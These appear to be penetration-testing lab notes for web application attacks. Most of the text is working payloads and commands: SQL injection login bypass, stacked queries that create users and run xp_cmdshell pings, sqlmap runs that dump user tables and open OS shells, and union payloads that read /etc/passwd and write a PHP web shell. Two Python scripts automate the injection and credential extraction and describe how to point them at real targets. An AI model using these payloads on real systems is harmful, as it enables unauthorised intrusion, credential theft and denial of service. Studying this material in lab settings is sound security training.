• Log on without valid credentials
• Test for SQL injection
• Create your own user account
• Create your own database
• Directory listing
• Perform a Denial-of-Service attack
• Use N-Stalker
• Use sqlmap

 

From Windows box: test the login form for SQL injection

A.      Go to the website's LOGIN BOX. Type blah' or 1=1 -- in the Username field (as your login name), leave the Password field empty, and press Enter to see if it logs you in. The quote closes the username string, or 1=1 makes the WHERE clause true for every row, and -- comments out the rest of the query, including the password check. (On MySQL the comment marker needs a trailing space, so type blah' or 1=1 -- followed by a space, or use # instead.)

B.      To create a user in the vulnerable database, type blah';insert into login values ('tim','bingo123'); -- in the Username field and click Log in. This relies on stacked queries (a second statement after the ;), which Microsoft SQL Server accepts; many MySQL/PHP setups run only the first statement, so this payload fails there. The table name login and its two columns are the lab's; adjust them to the target.

C.      To create a database (same stacked-query requirement), type blah';create database mydatabase; -- in the Username field, leave the Password field empty, and click Log in.

In the above query, mydatabase is the name of the database that you are going to create with the SQL injection query.

D.      To perform a DoS attack, type blah';exec master..xp_cmdshell 'ping www.website.com -l 65000 -t'; -- in the Username field, leave the Password field empty, and click Log in. In the above query you are running ping against www.website.com through an SQL injection query: -l sets the send buffer size and -t pings continuously until stopped, so the ping keeps running on the database server. xp_cmdshell only works if the application's database login has sysadmin rights and xp_cmdshell has been enabled; it is off by default in SQL Server 2005 and later (sqlmap's --os-shell tries to enable it through sp_configure).
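As an added example (not from the original notes or the lab), here is a throw-away Python login check that reproduces the bug the payloads in steps A to D exploit. SQLite stands in for SQL Server, and the login table, its columns and the admin credentials are made up for the demo. It shows the bypass against string-built SQL, the same check with bound parameters, and why the stacked-query payloads in B to D depend on the backend accepting more than one statement per request:

```python
import sqlite3

# Added example: a throw-away login check with the same string-concatenation bug
# the payloads above abuse. The table name, columns and credentials are constructed
# for this demo; SQLite stands in for the lab's SQL Server.
LOGIN_BYPASS = "blah' or 1=1 -- "          # trailing space: MySQL-style comment also works
STACKED_INSERT = "blah';insert into login values ('tim','bingo123'); -- "


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE login (username TEXT, password TEXT)")
    con.execute("INSERT INTO login VALUES ('admin', 's3cret')")
    con.commit()
    return con


def vulnerable_login(con, username, password):
    """Pastes the form fields into SQL. Returns the usernames the query matched."""
    sql = (f"SELECT username FROM login WHERE username='{username}' "
           f"AND password='{password}'")
    return [row[0] for row in con.execute(sql).fetchall()]


def safe_login(con, username, password):
    """Same check with bound parameters: the quote and the comment are just data."""
    rows = con.execute(
        "SELECT username FROM login WHERE username=? AND password=?",
        (username, password)).fetchall()
    return [row[0] for row in rows]


def stacked_insert(con, username, allow_batches):
    """Send the stacked-query payload and report whether user 'tim' now exists.

    allow_batches=False mimics a driver that runs one statement per call
    (Python's sqlite3.execute, PHP's mysql_query): the injected INSERT is rejected.
    allow_batches=True mimics a backend that accepts batches, as SQL Server does.
    """
    sql = f"SELECT username FROM login WHERE username='{username}' AND password=''"
    try:
        if allow_batches:
            con.executescript(sql)
        else:
            con.execute(sql)
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        pass  # "You can only execute one statement at a time."
    return con.execute(
        "SELECT COUNT(*) FROM login WHERE username='tim'").fetchone()[0] == 1


if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", vulnerable_login(con, LOGIN_BYPASS, ""))       # ['admin']
    print("parameterised:", safe_login(con, LOGIN_BYPASS, ""))          # []
    print("stacked, one statement per call:",
          stacked_insert(make_db(), STACKED_INSERT, False))             # False
    print("stacked, batches allowed:",
          stacked_insert(make_db(), STACKED_INSERT, True))              # True
```

The second half is the check worth doing before spending time on payloads B to D: if the first injected statement works but the stacked one silently does nothing, the backend or driver is executing one statement per request and you need a different route (UNION or blind extraction) instead.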

Admin logins - https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/

 

USE N-Stalker to look for vulnerabilities

From Windows box

A.      Run N-Stalker, enter the URL, choose the OWASP policy scan and click Start Scan.

B.       On completion of the scan, the Results Wizard appears. Select Save scan results (under Session Management Options) and Keep scan session for further analysis (under Next Steps), and click Next.

 

 

USE sqlmap to find DB info (NB: when an option takes its value with =, e.g. --cookie=..., put no space on either side of the =, and quote values that contain spaces or semicolons)

 

A.      Assume that you are a registered user of the http://www.website.com website and you want to recover the passwords of the other users.

Open a web browser, type http://www.website.com in the address bar and press Enter. The Moviescope lab page appears; log in to Moviescope with Username: sam and Password: test@123 and click Login.

Once you are logged in, click the View Profile tab and note the URL in the browser's address bar (this is the injectable URL used in the following commands).

Right-click anywhere on the web page and click Inspect Element (Q) from the context menu.

B.       The Developer Tools pane appears. Click the Console tab, type document.cookie at the console prompt and press Enter. Select the cookie value, right-click and Copy it. sqlmap needs this cookie because viewprofile.aspx is only reachable from an authenticated session.

C.      Open a terminal window.

D.      Type sqlmap -u "http://www.website.com/viewprofile.aspx?id=1" --cookie="<cookie value copied in step B>" --dbs and press Enter.

E.    When the "Do you want to skip test payloads specific for other DBMSes" prompt appears, type Y and press Enter. When "Do you want to include all tests for 'Microsoft SQL Server' extending provided level" appears, type Y and press Enter. When "Do you want to keep testing the others" appears, type N and press Enter. (Add --batch to accept sqlmap's default answers without prompting.)

F.       This lists the databases present on the MS SQL Server. It also displays the web server operating system, the web application technology and the back-end DBMS.

G.      To determine the tables in a database, type sqlmap -u "http://www.website.com/viewprofile.aspx?id=1" --cookie="<cookie value copied in step B>" -D <databasename> --tables and press Enter.

H.      To extract column information, type sqlmap -u "http://www.website.com/viewprofile.aspx?id=1" --cookie="<cookie value copied in step B>" -D <databasename> -T <tablename> --columns and press Enter.

I.         To get all info from the User_Login table, type sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value copied in step B>" -D moviescope -T User_Login --dump and press Enter to dump the whole User_Login table. Test the retrieved passwords on the website.

J.        To open a command shell, type sqlmap -u "http://www.website.com/viewprofile.aspx?id=1" --cookie="<cookie value copied in step B>" --os-shell and press Enter. On MS SQL Server this runs commands through xp_cmdshell, so it only works if the database login has sysadmin rights; sqlmap will offer to enable xp_cmdshell if it is disabled.

K.       From here you can type hostname or ipconfig to get details of the machine you have compromised.

https://www.hackingarticles.in/database-penetration-testing-using-sqlmap-part-1/

https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet

https://resources.infosecinstitute.com/important-sqlmap-commands/#gref


MYSQL

Connect to local database

mysql -u zabbix -D zabbixdb -p

 

SQLMAP

Use Burp Suite to capture the login request

Save the raw login request (headers included) to login.req

sqlmap -r login.req --level 5

 

Search for databases

sqlmap -u "http://192.168.1.1/index.php?par=" --dbs

 

Checking privileges of the users in the database

sqlmap -u "http://192.168.1.124/sqli/Less-1/?id=1" --privileges

 

Reading a file from the web server (needs the FILE privilege on MySQL)

sqlmap -u "http://192.168.1.124/sqli/Less-1/?id=1" --file-read=/xampp/htdocs/index.php --batch

 

Dump usernames and passwords

sqlmap -u "http://192.168.1.1/comment.php?id=123" --dbms=mysql --dump --threads=5

 

Dump tables

sqlmap -u "http://192.168.1.1/index.php?par=" -D dbname --tables

sqlmap -u "http://192.168.1.1/index.php?par=" -D dbname -T tablename --dump

 

Automated shell

sqlmap -u "http://192.168.1.1/comment.php?id=123" --dbms=mysql --os-shell

sqlmap -u "http://10.1.1.1/login.php" --forms --level 5 --risk 3 --string "The password you entered was not valid." --dbs --batch

sqlmap -l trace.txt --dbs (RDBMS enum; trace.txt is a Burp or WebScarab proxy log)

sqlmap -l trace.txt -D <db> --tables (list tables)

sqlmap -l trace.txt -D <db> -T <table> --dump (dump table content)

 

Crawl links

sqlmap -u "http://192.168.1.1" --crawl=1

sqlmap -u "http://192.168.1.1" --forms --batch --crawl=5 --cookie="jsessionid=1234" --level=5 --risk=3

 

Manual SQL injection commands (MySQL, union-based)

Check for SQLi vulnerability (a SQL error or a changed page means the quote reached the query)

?id=1'

 

Find the number of columns (increase the number until the query errors; the last value that works is the column count)

?id=1 order by 9 -- -

 

Find which column positions are displayed on the page (the numbers that show up are the slots you can use for output)

?id=1 union select 1,2,3,4,5,6,7,8,9 -- -

 

Get username of the SQL user

?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -

Get version

?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -

 

Get all tables

?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -

 

Get all columns from a specific table

?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -

 

Get content from the users table, from the columns name and password (0x3a is ':' and only serves as a delimiter between name and password; wrap the concat() in group_concat() to see several rows in one output slot)

?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 from users -- -

 

Read file (requires the FILE privilege and a path allowed by secure_file_priv; returns NULL otherwise)

?id=1 union select 1,2,3,4,load_file('/etc/passwd'),6,7,8,9 -- -

?id=1 union select 1,2,3,4,load_file('/var/www/login.php'),6,7,8,9 -- -

 

Create a file and read it back to check it really was created (into outfile also needs FILE and a directory the MySQL process can write to, and fails if the file already exists)

?id=1 union select 1,2,3,4,'this is a test message',6,7,8,9 into outfile '/var/www/test' -- -

?id=1 union select 1,2,3,4,load_file('/var/www/test'),6,7,8,9 -- -

 

Create a file to get a shell (double quotes inside the PHP, because the SQL string is single-quoted; if quotes are filtered, supply the PHP as a 0x... hex literal instead)

?id=1 union select null,null,null,null,'<?php system($_GET["cmd"]); ?>',6,7,8,9 into outfile '/var/www/shell.php' -- -

?id=1 union select null,null,null,null,load_file('/var/www/shell.php'),6,7,8,9 -- -

Then go to the browser and see if you can execute commands

http://<targetip>/shell.php?cmd=id
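The union-based chain above, automated as an added example that is not part of the original notes. SQLite stands in for MySQL (sqlite_master and pragma_table_info() replace information_schema, || replaces concat(), and there is no load_file or into outfile), and the vulnerable page, its tables and the credentials are constructed for the demo. The column-count probe, marker discovery and extraction work for any column count rather than the fixed nine used above:

```python
import sqlite3

# Added example: automates the union-based chain from the notes against a
# constructed vulnerable page. SQLite stands in for MySQL, so sqlite_master and
# pragma_table_info() replace information_schema and || replaces concat().
# Table names, columns and credentials are made up for the demo.


def make_app():
    """Returns page(id_param), which renders the title column of a query that
    pastes the id parameter straight into SQL: the bug class probed by ?id=1'."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE movies (id INTEGER, title TEXT, year INTEGER);
        CREATE TABLE users (id INTEGER, name TEXT, password TEXT);
        INSERT INTO movies VALUES (1, 'Heat', 1995);
        INSERT INTO users VALUES (1, 'sam', 'test@123');
    """)

    def page(id_param):
        sql = f"SELECT id, title, year FROM movies WHERE id={id_param}"
        rows = con.execute(sql).fetchall()
        return "\n".join(str(row[1]) for row in rows)  # only the title is rendered
    return page


def is_injectable(page):
    """?id=1' : a bare quote breaks the SQL only if the input reaches the query unquoted."""
    try:
        page("1'")
        return False
    except sqlite3.OperationalError:
        return True


def count_columns(page, max_cols=20):
    """ORDER BY n works while n <= number of selected columns; the first error reveals it."""
    for n in range(1, max_cols + 1):
        try:
            page(f"1 order by {n}-- -")
        except sqlite3.OperationalError:
            return n - 1
    return None


def find_visible_column(page, ncols):
    """UNION SELECT a distinct marker per slot; the one echoed back is usable for output."""
    markers = ",".join(f"'mark{i}'" for i in range(1, ncols + 1))
    out = page(f"-1 union select {markers}-- -")  # id=-1 so only the union row shows
    for i in range(1, ncols + 1):
        if f"mark{i}" in out:
            return i
    return None


def extract(page, ncols, col, expr, source=""):
    """Put expr in the visible slot and NULL elsewhere; source is an optional FROM ... tail."""
    slots = ["null"] * ncols
    slots[col - 1] = expr
    out = page(f"-1 union select {','.join(slots)} {source}-- -")
    return [line for line in out.split("\n") if line]


def enumerate_db(page):
    """The whole chain from the notes: detect, count columns, find slot, tables, columns, rows."""
    if not is_injectable(page):
        return None
    ncols = count_columns(page)
    col = find_visible_column(page, ncols)
    tables = extract(page, ncols, col, "name", "from sqlite_master where type='table'")
    columns = extract(page, ncols, col, "name", "from pragma_table_info('users')")
    creds = extract(page, ncols, col, "name || ':' || password", "from users")
    return ncols, col, tables, columns, creds


if __name__ == "__main__":
    print(enumerate_db(make_app()))
    # (3, 2, ['movies', 'users'], ['id', 'name', 'password'], ['sam:test@123'])
```

Against a real target, page() becomes an HTTP request with the payload in the id parameter and the error check becomes a match on the error text or a page-length change; the rest of the logic is the same. Note that only one slot is rendered here, which is why the marker step matters: putting the expression in any other column position returns nothing visible even though the query succeeded.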

 

https://jensoroger.wordpress.com/2019/02/28/ceh-practical-lpt-master-ctf-notes-in-general/